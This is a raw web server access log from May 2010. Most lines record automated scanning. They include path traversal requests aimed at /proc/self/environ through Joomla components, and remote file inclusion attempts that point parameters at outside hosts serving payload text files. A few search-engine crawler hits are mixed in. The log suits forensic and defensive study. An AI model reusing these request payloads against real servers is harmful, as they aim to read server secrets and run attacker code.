121.190.102.21 - - [19/May/2010:04:14:58 -0500] "GET /logs/access_log.1265241600//inc/urgency_type.php?mosConfig_absolute_path=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:04:14:59 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:04:15:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:04:16:36 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
67.195.112.180 - - [19/May/2010:04:17:04 -0500] "GET /logs/access_log.1189036800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.226 - - [19/May/2010:04:18:36 -0500] "GET /logs/access_log.1252540800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.26.227.88 - - [19/May/2010:04:23:11 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:04:23:11 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.23.9.198 - - [19/May/2010:04:24:52 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:04:24:53 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:04:24:53 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:04:24:53 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:24:53 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:24:53 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:04:24:53 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:04:24:53 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:24:54 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:04:24:54 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:24:55 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:24:55 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.26.227.88 - - [19/May/2010:04:25:20 -0500] "GET /logs/access_log.1271376000//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:04:25:21 -0500] "GET /logs/access_log.1263772800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.23.9.198 - - [19/May/2010:04:25:57 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:25:57 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
89.108.70.32 - - [19/May/2010:04:26:00 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:04:26:00 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:04:26:01 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:04:26:01 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
70.38.71.147 - - [19/May/2010:04:26:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:26:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:04:27:06 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:27:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:27:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:27:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:27:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:04:28:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:04:28:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:28:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.204.241 - - [19/May/2010:04:36:06 -0500] "GET /logs/access_log.1197590400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [19/May/2010:04:36:12 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:36:12 -0500] "GET /logs/access_log.1273017600%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:36:12 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:04:39:15 -0500] "GET /logs/access_log.1219017600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.9.198 - - [19/May/2010:04:40:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:40:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:40:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:40:31 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:40:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:40:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.204.177 - - [19/May/2010:04:41:36 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:04:41:52 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.9.198 - - [19/May/2010:04:42:12 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:04:42:21 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:04:45:01 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:01 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:28 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:28 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
125.248.34.130 - - [19/May/2010:04:45:29 -0500] "GET /logs/access_log.1273017600%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
70.38.71.147 - - [19/May/2010:04:45:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
125.248.34.130 - - [19/May/2010:04:45:29 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.248.34.130 - - [19/May/2010:04:45:29 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.38.71.147 - - [19/May/2010:04:45:33 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:33 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:45:34 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.30.142.216 - - [19/May/2010:04:45:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.71.147 - - [19/May/2010:04:46:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.128.80.17 - - [19/May/2010:04:47:15 -0500] "GET /logs/access_log.1243900800/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:04:47:15 -0500] "GET //errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:04:47:15 -0500] "GET /logs//errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
70.38.71.147 - - [19/May/2010:04:47:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:47:27 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:04:47:27 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.46.13.131 - - [19/May/2010:04:47:36 -0500] "GET /logs/access_log.1202860800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.128.80.17 - - [19/May/2010:04:47:50 -0500] "GET /logs/access_log.1213920000/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:04:48:43 -0500] "GET /logs/access_log.1238544000/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.46.195.228 - - [19/May/2010:04:52:35 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:04:54:48 -0500] "GET /logs/access_log.1225756800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.248.150.84 - - [19/May/2010:04:55:52 -0500] "GET /logs/access_log.1273276800%20%20//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:04:55:52 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:04:55:56 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:04:56:08 -0500] "GET /logs/access_log.1273276800//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:15 -0500] "GET /logs/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:15 -0500] "GET /?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:15 -0500] "GET /logs/access_log.1273017600/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:27 -0500] "GET /logs/access_log.1273017600/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:28 -0500] "GET /?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:56:28 -0500] "GET /logs/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:04:57:28 -0500] "GET /logs/access_log.1273104000//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:04:57:43 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.248.150.84 - - [19/May/2010:04:58:07 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:04:58:07 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:58:21 -0500] "GET /logs/access_log.1273017600%20%20/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:58:21 -0500] "GET /logs/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:58:21 -0500] "GET /?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.46.199.199 - - [19/May/2010:04:58:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [19/May/2010:04:58:29 -0500] "GET /?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:58:29 -0500] "GET /logs/access_log.1273017600%20%20/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:04:58:30 -0500] "GET /logs/?ff_compath=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
208.115.111.248 - - [19/May/2010:05:02:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
62.140.23.192 - - [19/May/2010:05:03:40 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:03:40 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:03:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.128.80.17 - - [19/May/2010:05:04:26 -0500] "GET /logs/access_log.1265673600/config.inc.php?path_escape=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:05:04:26 -0500] "GET //config.inc.php?path_escape=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:05:04:26 -0500] "GET /logs//config.inc.php?path_escape=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
64.128.80.17 - - [19/May/2010:05:04:33 -0500] "GET /logs/access_log.1263081600/config.inc.php?path_escape=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.831"
207.46.199.43 - - [19/May/2010:05:08:36 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.67.9.133 - - [19/May/2010:05:08:49 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.133.201.194 - - [19/May/2010:05:09:45 -0500] "GET /logs/access_log.1273017600/components/com_facileforms/facileforms.frame.php?ff_compath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:11:14 -0500] "GET /logs/access_log.1268956800%20%20//Neos_Chronos/header.php?base_folder=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.10.8 - - [19/May/2010:05:11:15 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.siys.com/crystal/idrfi.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.834"
94.23.20.123 - - [19/May/2010:05:13:35 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:13:35 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
90.183.248.17 - - [19/May/2010:05:14:20 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.183.248.17 - - [19/May/2010:05:14:21 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.183.248.17 - - [19/May/2010:05:14:21 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.140.23.192 - - [19/May/2010:05:14:50 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.23.20.123 - - [19/May/2010:05:14:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:14:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
90.183.248.17 - - [19/May/2010:05:15:36 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.195.235 - - [19/May/2010:05:17:06 -0500] "GET /logs/access_log.1266278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:05:18:05 -0500] "GET /logs/access_log.1222041600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.10.8 - - [19/May/2010:05:19:21 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.siys.com/crystal/idrfi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.834"
67.222.10.8 - - [19/May/2010:05:19:21 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.siys.com/crystal/idrfi.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.834"
67.222.10.8 - - [19/May/2010:05:19:21 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.siys.com/crystal/idrfi.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.834"
62.140.23.192 - - [19/May/2010:05:22:30 -0500] "GET /logs/access_log.1265587200/setup.php?dir=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:22:30 -0500] "GET /setup.php?dir=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:22:30 -0500] "GET /logs/setup.php?dir=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [19/May/2010:05:22:30 -0500] "GET /logs/access_log.1264118400/setup.php?dir=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.20.123 - - [19/May/2010:05:24:50 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:24:50 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:24:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:24:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:24:50 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [19/May/2010:05:24:51 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
